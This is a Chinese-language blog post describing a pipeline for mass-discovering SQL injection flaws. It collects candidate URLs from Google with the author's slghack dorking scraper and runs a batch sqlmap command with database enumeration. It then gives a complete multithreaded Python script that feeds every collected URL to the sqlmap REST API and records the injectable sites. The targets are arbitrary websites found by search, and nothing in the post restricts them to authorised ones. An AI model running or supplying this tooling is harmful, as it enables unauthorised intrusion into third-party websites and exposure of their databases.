- 前言
- slghack自動化蒐集URL
- Sqlmap API
- 指令碼slghack_sqli
前言
挖掘SQL隱碼攻擊漏洞的一種方式就是透過Google Hacking搜尋那些可能存在SQL的URL,然後手工的探測注入點。但是現在的SQL隱碼攻擊漏洞的網站是比較少的了,所以這樣一個一個手工測效率有一點低。
sqlmap比較好的一點是可批次掃描多個URL中的注入點,比如這樣:
準備一個包含要掃描的URL列表的檔案(每個URL佔一行),然後使用 -m 選項指定要掃描的這個URL檔案,執行如下的命令就可以:
sqlmap -m urls.txt --batch --level=3 --random-agent --dbs
還可以使用 --threads 來指定要使用的執行緒數。
slghack自動化蒐集URL
最近寫了一個小的python爬蟲指令碼,能從Google頁面批次爬取URL。
slghack是一個基於Python第三方庫yagooglesearch開發的,使用之前需要安裝依賴: pip install yagooglesearch。
專案地址: https://github.com/zhx-hex/slghack
Sqlmap API
在Sqlmap專案的根目錄下面有個sqlmapapi.py,可能很少有人注意到。
sqlmapapi.py就是sqlmap的分散式掃描sql注入,可以利用sqlmapapi.py開啟服務埠,然後向sqlmapapi傳送請求,就可以進行sql注入。
使用方法也很簡單 python sqlmapapi.py -s,在本地的8775埠就會開啟一個sqlmapapi 的服務,也可以透過 -p 指定埠。
sqlmapapi 沒有官方的API文件,只有一些第三方的文件。
參考文件:Unofficial SQLmap RESTful API documentation
大致工作流程:
-
透過GET請求
http://ip:port/task/new建立一個新的掃描任務 -
透過POST請求
http://ip:port/scan/start並透過json格式提交引數,開啟一個掃描 -
透過GET請求
http://ip:port/scan//status來獲取指定的taskid的掃描狀態:一種是run狀態,一種是terminated狀態 -
掃描完成後獲取掃描的結果
指令碼slghack_sqli
把slghack蒐集到的URL複製到sql_urls.txt裡面,就可以多執行緒批次檢測了。
import json
import queue
import requests
from threading import Thread
from time import sleep
class slghack_sqli:
def __init__(self, server="http://127.0.0.1:8775", urlsfile=None, output="sqli_result.txt"):
self.server = server
self.urlsfile = urlsfile
self.ouput = output
self.task_queue = queue.Queue()
def get_urls(self):
with open(self.urlsfile, "r") as f:
for url in f.readlines():
self.task_queue.put(url.strip())
def sent_server(self):
threads = []
while not self.task_queue.empty():
url = self.task_queue.get().strip()
print(f"Target URL: {url}")
t = Thread(target=self.scan, args=(url,))
threads.append(t)
t.start()
for t in threads:
t.join()
def scan(self, url):
try:
# 透過GET請求 http://ip:port/task/new 建立一個新的掃描任務
r = requests.get(f"{self.server}/task/new")
taskid = r.json()['taskid']
# 透過POST請求 http://ip:port/scan/start 並透過json格式提交引數,開啟一個掃描
r = requests.post(
f"{self.server}/scan/{taskid}/start",
data=json.dumps({'url': url}), headers={'content-type': 'application/json'}
)
# 透過GET請求 http://ip:port/scan//status 來獲取指定的taskid的掃描狀態
r = requests.get(f"{self.server}/scan/{taskid}/status")
count = 0
while r.json()["status"] == "running":
sleep(6)
r = requests.get(f"{self.server}/scan/{taskid}/status")
print(r.json()["status"])
count += 1
if count == 30:
# 每個task最多跑6*30=180s結束
requests.get(f"{self.server}/scan/{taskid}/stop")
r = requests.get(f"{self.server}/scan/{taskid}/data")
requests.get(f"{self.server}/scan/{taskid}/delete")
if r.json()['data']:
print("Injection found: " + url)
with open(self.ouput, "a") as f:
f.write(url + "\n")
except requests.ConnectionError:
print("Connection error!")
if __name__ == '__main__':
# 把slghack跑的結果複製到sql_urls.txt
ssqli = slghack_sqli(urlsfile='sql_urls.txt')
ssqli.get_urls()
ssqli.sent_server()
這種批次掃描,比手工測試的效率肯定要高很多。
參考文章: https://www.freebuf.com/articles/web/204875.html
若有錯誤,歡迎指正!o( ̄▽ ̄)ブ